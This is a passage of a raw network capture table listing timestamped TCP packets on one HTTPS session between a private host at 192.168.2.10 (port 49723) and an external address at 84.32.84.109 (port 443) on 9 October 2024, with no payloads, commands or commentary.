Oct 9, 2024 16:16:03.502340078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.502420902 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.502429008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.502480984 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.502577066 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.502758980 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.502773046 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.502820969 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.502840042 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.502845049 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.502862930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.502867937 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.502912045 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.502916098 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.502927065 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.502970934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.502976894 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.503007889 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.503031969 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.503037930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.503047943 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.503055096 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.503084898 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.503093004 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.503099918 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.503128052 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.503468990 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.503550053 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.503557920 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.503593922 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.503671885 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.503710985 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.503731966 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.503742933 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.503757954 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.503760099 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.503777981 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.503782988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.503796101 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.503807068 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.503834963 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.503839970 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.503923893 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.504153013 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.504204035 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.504214048 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.504228115 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.504268885 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.504268885 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.504275084 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.504407883 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.504436970 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.504460096 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.504467010 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.504487991 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.505131006 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.505172968 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.505187988 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.505192995 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.505330086 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.509188890 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.509227991 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.509260893 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.509268999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.509298086 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.509370089 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.509414911 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.509423971 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.509460926 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.509469986 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.509516954 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.509859085 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.510026932 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.510027885 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.510036945 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.510061026 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.510895014 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.510927916 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.510948896 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.510957003 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.510977030 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.512547016 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.512684107 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.512701988 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.512711048 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.512847900 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.513818979 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.513871908 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.513880014 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.513919115 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.513956070 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.514018059 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.514621973 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.514751911 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.514753103 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.514763117 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.514797926 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.514818907 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.514825106 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.514844894 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.514903069 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.514911890 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.514960051 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.515912056 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.516087055 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.516091108 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.516102076 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.516370058 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.516987085 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.517323017 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.517373085 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.517453909 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.517784119 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.519337893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.519467115 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.520454884 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.520570040 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.521317959 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.521364927 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.521390915 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.521397114 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.521420956 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.521430016 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.521467924 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.521471024 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.521559000 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.521562099 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.521569967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.521615028 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.521615028 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.521648884 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.521656990 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.521665096 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.521697044 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.566030025 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.575938940 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.575988054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.576029062 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.576112986 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.576113939 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.576126099 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.576153994 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.576241970 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.576248884 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.576316118 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.597302914 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.597450972 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.597461939 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.597511053 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.597547054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.597596884 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.597604036 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.597654104 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.597763062 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.597796917 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.597819090 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.597825050 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.597851038 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.597938061 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.598777056 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.598814964 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.598835945 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.598841906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.598881960 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.600574970 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.600625038 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.600650072 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.600653887 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.600668907 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.600732088 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.601453066 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.601495028 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.601516008 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.601521969 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.601536036 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.601625919 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.602292061 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.602344990 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.602420092 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.602473974 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.602766991 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.602808952 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.602818012 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.602824926 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.602845907 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.602962017 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.603612900 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.603780031 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.603780985 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.603795052 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.603844881 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.603844881 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.605227947 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.605257988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.605278015 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.605283976 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.605308056 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.605365038 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.607146978 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.607183933 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.607201099 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.607204914 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.607238054 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.607254028 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.608238935 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.608284950 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.608304024 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.608308077 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.608325958 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.608381987 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.608402967 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.608407974 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.608417988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.608422041 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.608480930 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.608489037 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.608524084 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.608839035 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.608884096 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.608916998 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.608959913 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.663616896 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.663747072 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.663788080 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.663810015 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.663819075 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.663841009 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.663861990 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.663861990 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.685580969 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.685664892 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.685700893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.685723066 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.685730934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.685753107 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.685771942 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.685822964 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.685827971 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.685859919 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.686009884 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.686069012 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.686175108 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.686233044 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.687113047 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.687195063 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.687254906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.687309027 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.688676119 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.688714981 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.688745975 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.688750029 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.688766003 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.688849926 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.689647913 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.689707994 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.689816952 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.689872980 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.690958977 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.691106081 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.691133022 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.691139936 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.691157103 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.691294909 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.691314936 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.691320896 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.691329956 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.691351891 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.691374063 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.691378117 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.691416025 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.692090988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.692261934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.692281961 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.692287922 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.692347050 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.692347050 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.693505049 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.693543911 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.693566084 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.693572044 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.693594933 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.693754911 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.695054054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.695094109 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.695113897 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.695118904 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.695143938 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.695627928 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.695842981 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.695930004 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.695950031 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.695955992 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.695988894 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.695990086 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.695990086 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.696003914 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.696074963 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.696093082 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.696114063 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.696125031 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.696158886 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.696343899 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.696400881 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.696438074 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.696528912 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.751348972 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.751425028 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.751449108 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.751457930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.751494884 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.751518011 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.751539946 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.751559019 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.751566887 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.751580000 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.751596928 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.772952080 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.773013115 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.773169994 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.773228884 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.773251057 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.773257971 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.773273945 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.773371935 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.773525000 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.773531914 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.773575068 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.774105072 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.774159908 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.774178028 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.774183989 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.774202108 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.774384022 CEST	443	49723	84.32.84.109	192.168.2.10
